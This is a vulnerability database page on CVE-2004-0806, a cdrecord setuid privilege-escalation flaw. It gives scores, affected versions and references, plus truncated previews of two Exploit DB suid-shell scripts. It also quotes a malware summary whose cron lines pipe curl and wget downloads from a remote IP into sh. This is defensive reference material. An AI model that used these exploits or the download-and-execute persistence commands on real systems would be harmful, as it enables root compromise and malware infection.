Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
7.2
CVSSv2

CVE-2004-0806

Published: 31/12/2004 Updated: 11/10/2017
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
VMScore: 730
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

cdrecord in the cdrtools package prior to 2.01, when installed setuid root, does not properly drop privileges before executing a program specified in the RSH environment variable, which allows local users to gain privileges.

Vulnerable Product Search on Vulmon Subscribe to Product

cdrtools cdrecord 1.11

cdrtools cdrecord 2.0

Exploits

Exploit DB: CDRecord's ReadCD - Local Privilege Escalation
#!/bin/bash echo "readcd-expsh -- ReadCD local exploit ( Test on cdrecord-201-0a272mdk)" echo "Author : newbug [at] chrootorg" echo "Date :09132004" echo "IRC : ircchrootorg #discuss" export READCD=/usr/bin/readcd cd /tmp cat > sc <<_EOF_ #include <unistdh> #include <sys/typesh> #include <stdioh> int main ...
Exploit DB: CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation
#!/bin/bash # # cdrecord-suidshellsh - I)ruid [CAU] (092004) # # Exploits cdrecord's exec() of $RSH before dropping privs # cat > /cpbinbashc << __EOF__ #include <stdioh> #include <sys/typesh> #include <sys/stath> #include <fcntlh> main( int argc, char *argv[] ) { int fd1, fd2; int count; char buffer[1]; ...

Github Repositories

https://github.com/hongdal/notes

notes of scripts

VirusShare_775b04d9458a409e82ef05fb1b3dcc95sh Summary This script stops any firewalls, configures DNS server as 8888 Then, it sets /var/spool/cron/root to execute specific command The commands are: "*/5 * * * * curl -fsSL 18524425191/ish | sh" */5 * * * * wget -q -O- 18524425191/ish | sh Then, it cre

References

NVD-CWE-Otherhttp://seclists.org/lists/bugtraq/2004/Sep/0097.htmlhttp://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2004-09/0108.htmlhttp://www.securityfocus.org/bid/11075http://secunia.com/advisories/12481/http://www.kb.cert.org/vuls/id/700326http://securitytracker.com/id?1011091ftp://patches.sgi.com/support/free/security/advisories/20060401-01-Uhttp://secunia.com/advisories/19532http://www.mandriva.com/security/advisories?name=MDKSA-2004:091https://bugzilla.fedora.us/show_bug.cgi?id=2058https://exchange.xforce.ibmcloud.com/vulnerabilities/17303https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9805https://nvd.nist.govhttps://github.com/hongdal/noteshttps://www.exploit-db.com/exploits/469/https://www.kb.cert.org/vuls/id/700326
CVSSv2
CVSSv2
CVSSv3
VMScore
Recommendations:
CVE-2023-7073CVE-2024-5496CVE-2024-5495XPath injectionbypassCVE-2024-30043CVE-2024-24919denial of serviceCVE-2024-35468
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook